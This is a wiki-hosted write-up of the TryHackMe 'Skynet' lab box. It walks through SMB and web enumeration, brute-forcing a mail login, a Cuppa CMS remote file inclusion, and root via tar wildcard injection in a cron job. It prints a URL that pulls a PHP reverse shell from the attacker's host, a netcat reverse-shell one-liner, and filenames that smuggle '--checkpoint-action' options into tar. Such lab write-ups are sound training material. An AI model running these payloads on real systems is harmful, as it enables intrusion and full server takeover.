imported>Aghanim at 12:38, 11 January 2022

2022-01-11T12:38:34Z

New page

{{Infobox WriteUp
| name = Skynet
| platform = TryHackMe
| os = Linux
| difficulty = Easy
| techniques = SMB, Cuppa CMS RFI, Cron Wildcard
}}

[[File:2022-01-image-81.png|thumb]]

Since HackTheBox had problems yesterday I did OSCP like box from TryHackMe instead. This is a Linux box with a pretty straightforward approach. In the initial search there were a couple ports open, such as SMB, HTTP, POP3 and imap. Enumerting each of these ports will give you initial access, and root eventually.

----

== Enumeration ==

I start with an NMAP scan. From the NMAP scan I see that '''SMB''', '''IMAP, POP3, HTTP '''are some interesting open ports. So we will enumerate them in a bit.

<syntaxhighlight lang="bash">
root@ip-10-10-253-253:~/ctf# nmap -sC -sV 10.10.73.85 -oN nmap.result

Starting Nmap 7.60 ( https://nmap.org ) at 2022-01-11 11:21 GMT
Nmap scan report for ip-10-10-73-85.eu-west-1.compute.internal (10.10.73.85)
Host is up (0.00060s latency).
Not shown: 994 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 99:23:31:bb:b1:e9:43:b7:56:94:4c:b9:e8:21:46:c5 (RSA)
| 256 57:c0:75:02:71:2d:19:31:83:db:e4:fe:67:96:68:cf (ECDSA)
|_ 256 46:fa:4e:fc:10:a5:4f:57:57:d0:6d:54:f6:c3:4d:fe (EdDSA)
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Skynet
110/tcp open pop3 Dovecot pop3d
|_pop3-capabilities: RESP-CODES AUTH-RESP-CODE CAPA SASL TOP PIPELINING UIDL
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
143/tcp open imap Dovecot imapd
|_imap-capabilities: listed ID more OK SASL-IR LITERAL+ have IDLE IMAP4rev1 post-login Pre-login capabilities LOGINDISABLEDA0001 LOGIN-REFERRALS ENABLE
445/tcp open netbios-ssn Samba smbd 4.3.11-Ubuntu (workgroup: WORKGROUP)
MAC Address: 02:55:B6:AE:BF:BF (Unknown)
Service Info: Host: SKYNET; OS: Linux; CPE: cpe:/o:linux:linux_kernel

Host script results:
|_nbstat: NetBIOS name: SKYNET, NetBIOS user: , NetBIOS MAC: (unknown)
| smb-os-discovery:
| OS: Windows 6.1 (Samba 4.3.11-Ubuntu)
| Computer name: skynet
| NetBIOS computer name: SKYNET\x00
| Domain name: \x00
| FQDN: skynet
|_ System time: 2022-01-11T05:21:32-06:00
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
| smb2-security-mode:
| 2.02:
|_ Message signing enabled but not required
| smb2-time:
| date: 2022-01-11 11:21:32
|_ start_date: 1600-12-31 23:58:45

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 14.33 seconds

</syntaxhighlight>

I like to start enumerating SMB first to see if I find anything interesting.

=== Enumerating SMB ===

Taking a look at what shares are available we find some interesting. Since anonymous access is allowede we can list the shares and possible access some of them.

<syntaxhighlight lang="bash">
root@ip-10-10-253-253:~/ctf# smbclient -L //10.10.73.85
WARNING: The "syslog" option is deprecated
Enter WORKGROUP\root's password:

Sharename Type Comment
--------- ---- -------
print$ Disk Printer Drivers
anonymous Disk Skynet Anonymous Share
milesdyson Disk Miles Dyson Personal Share
IPC$ IPC IPC Service (skynet server (Samba, Ubuntu))
Reconnecting with SMB1 for workgroup listing.

Server Comment
--------- -------

Workgroup Master
--------- -------
WORKGROUP SKYNET

</syntaxhighlight>

The two interersting shares here is '''anonymous '''and '''milesdyson.''' In the anonymous share we find a note that says that there have been a system malfunction and all skynet employees must change their password.

root@ip-10-10-253-253:~/ctf# cat attention.txt
A recent system malfunction has caused various passwords to be changed. All skynet employees are required to change their password after seeing this.
-Miles Dyson

</pre>

Digging furthere in the share, there is a directory called '''logs.''' In the directory there are some log files, all of them are empty except one. This looks like a list of passwords, which we will save for later.

<syntaxhighlight lang="bash">
root@ip-10-10-253-253:~/ctf# cat log1.txt
cyborg007haloterminator
terminator22596
terminator219
terminator20
terminator1989
terminator1988
terminator168
terminator16
terminator143
terminator13
terminator123!@#
terminator1056
terminator101
terminator10
terminator02
terminator00
roboterminator
pongterminator
manasturcaluterminator
exterminator95
exterminator200
dterminator
djxterminator
dexterminator
determinator
cyborg007haloterminator
avsterminator
alonsoterminator
Walterminator
79terminator6
1996terminator

</syntaxhighlight>

The other share''', milesdyson, '''we have no access to it. One of the question in the task is '''what is miles dysons password. '''

=== Enumerating HTTP ===

Look at the webserver we are presented with skynets searchengine. I didn't find anything interesting here, so I started up gobuster and did a subdirectory bruteforce using the '''common.txt '''wordlist.

[[File:2022-01-image-82.png|thumb]]

<syntaxhighlight lang="bash">
root@ip-10-10-253-253:~/ctf# gobuster dir -u http://10.10.73.85 -w /usr/share/wordlists/dirb/common.txt
===============================================================
2022/01/11 11:41:40 Starting gobuster
===============================================================
/.hta (Status: 403)
/.htaccess (Status: 403)
/.htpasswd (Status: 403)
/admin (Status: 301)
/config (Status: 301)
/css (Status: 301)
/index.html (Status: 200)
/js (Status: 301)
/server-status (Status: 403)
/squirrelmail (Status: 301)
===============================================================
2022/01/11 11:41:40 Finished
===============================================================

</syntaxhighlight>

One that stands out here is '''squirrelamil. '''The other subdirectories we had no access to.

[[File:2022-01-image-85.png|thumb]]

From earlier enumeration we have a username for Miles Dyson, which is '''milesdyson''' and we have a list of passwords from '''logs1.txt''' we could try out.

[[File:2022-01-image-84.png|thumb]]

So spinning up '''BurpSuit '''we could intercept login request, send it to intruder and try and bruteforce our way in. In the picture below I've added the position where intruder will insert our passwordlist.

[[File:2022-01-image-86.png|thumb]]

Right off the bat we can see that '''cyborg007haloterminator '''have another length than the other passwords, and HTTP status code of 302 (redirect), giving us a hint that this might be the correct password.

[[File:2022-01-image-87.png|thumb]]

=== Squirrel Mail ===

Logging into Miles Dysons inbox we find his SMB password and we can try and see what we can find in his personal SMB share, milesdyson.

[[File:2022-01-image-88.png|thumb]]

Inside his share we find alot of files, but one of them is named '''important.txt'''.

<syntaxhighlight lang="bash">
root@ip-10-10-253-253:~/ctf# cat important.txt

1. Add features to beta CMS /45kra24zxs28v3yd
2. Work on T-800 Model 101 blueprints
3. Spend more time with my wife

</syntaxhighlight>

=== Hidden Directory ===

There is an hidden directory on the webserver named ''' /45kra24zxs28v3yd'''.

[[File:2022-01-image-89.png|thumb]]

Running gobuster against this hidden directory we find another subdirectory named '''Administrator. '''

<syntaxhighlight lang="bash">
root@ip-10-10-253-253:~/ctf# gobuster dir -u http://10.10.73.85/45kra24zxs28v3yd/ -w /usr/share/wordlists/dirb/common.txt
===============================================================
2022/01/11 11:58:11 Starting gobuster
===============================================================
/.hta (Status: 403)
/.htaccess (Status: 403)
/.htpasswd (Status: 403)
/administrator (Status: 301)
/index.html (Status: 200)
===============================================================
2022/01/11 11:58:12 Finished

</syntaxhighlight>

[[File:2022-01-image-90.png|thumb]]

A quick [https://www.exploit-db.com/exploits/25971 google search] reveal that there is a '''Remote File Inclusion '''vulnerability in this CMS, making it possbile for us to get a reverse shell.

From Exploit-db:

An attacker might include local or remote PHP files or read non-PHP files with this vulnerability. User tainted data is used when creating the file name that will be included into the current file. PHP code in this file will be evaluated, non-PHP code will be embedded to the output. This vulnerability can lead to full server compromise.

http://target/cuppa/alerts/alertConfigField.php?urlConfig=[FI]
</pre>

and using gobuster to verify that there is an '''alerts '''sub directory.

<syntaxhighlight lang="bash">
root@ip-10-10-253-253:~/ctf# gobuster dir -u http://10.10.73.85/45kra24zxs28v3yd/administrator/ -w /usr/share/wordlists/dirb/common.txt -x php

===============================================================
2022/01/11 12:01:21 Starting gobuster
===============================================================
/.htaccess (Status: 403)
/.htaccess.php (Status: 403)
/.htpasswd (Status: 403)
/.htpasswd.php (Status: 403)
/.hta (Status: 403)
/.hta.php (Status: 403)
/alerts (Status: 301)
/classes (Status: 301)
/components (Status: 301)
/index.php (Status: 200)
/index.php (Status: 200)
/js (Status: 301)
/media (Status: 301)
/templates (Status: 301)
===============================================================
2022/01/11 12:01:22 Finished

</syntaxhighlight>

A quick PoC:

[[File:2022-01-image-91.png|thumb]]

== Initial access ==

Confirming that we have '''LFI, '''we could try '''RFI. '''

The steps are as follow:

* Edit the php reverse shell script and add our local ip and port. * Start a simple http server * Start a netcat listener. * Visit <code>http://10.10.73.85/45kra24zxs28v3yd/administrator/alerts/alertConfigField.php?urlConfig=http://10.10.253.253:9000/php-reverse-shell.php</code>* And we have a connection on our listener.

[[File:2022-01-image-92.png|thumb]]

And after stabilizing our shell, we can look for '''user.txt '''

[[File:2022-01-image-93.png|thumb]]

== Root ==

In '''Miles Dysons '''home directory there is a directory caleld '''backups''' where there are two files '''backup.sh '''and '''backup.tgz. '''Both are owned by root.

<syntaxhighlight lang="bash">
www-data@skynet:/home/milesdyson/backups$ ls -l
total 4
-rwxr-xr-x 1 root root 74 Sep 17 2019 backup.sh
-rw-r--r-- 1 root root 0 Jan 11 06:29 backup.tgz
www-data@skynet:/home/milesdyson/backups$ cat backup.sh
#!/bin/bash
cd /var/www/html
tar cf /home/milesdyson/backups/backup.tgz *

</syntaxhighlight>

and looking at '''Crontab '''we see that '''backup.sh '''is executed every minute.

<syntaxhighlight lang="bash">
www-data@skynet:/home/milesdyson/backups$ cat /etc/crontab
*/1 * * * * root /home/milesdyson/backups/backup.sh

</syntaxhighlight>

Since '''tar '''is using wildcard we can abuse it with placing our shell in the direcotry its backing up since we have write permission to that directory. And from '''GTFObins. '''

[[File:2022-01-image-94.png|thumb]]

<syntaxhighlight lang="bash">
www-data@skynet:/var/www/html$ echo "mkfifo /tmp/fmbw; nc 10.10.253.253 8888 0/tmp/fmbw 2>&1; rm /tmp/fmbw" > shell.sh
www-data@skynet:/var/www/html$ echo "" > "--checkpoint-action=exec=sh shell.sh"
www-data@skynet:/var/www/html$ echo "" > --checkpoint=1
</syntaxhighlight>

From '''tar '''man page:

{| class="wikitable"
|-
| --checkpoint-action=ACTION
| Execute ACTION at every checkpoint. ACTION may be one of the following:
|}

{| class="wikitable"
|-
| --checkpoint[=NUMBER]
| Use "checkpoints": display a progress message every NUMBER records (default 10).
|}

Starting our netcat listener and listening to port 8888, we wait for cron to run the script.

[[File:2022-01-image-95.png|thumb]]

[[Category:Linux]]
[[Category:TryHackMe]]
[[Category:Write-ups]]

Write-ups/THM/Skynet - Revision history

imported>Aghanim at 12:38, 11 January 2022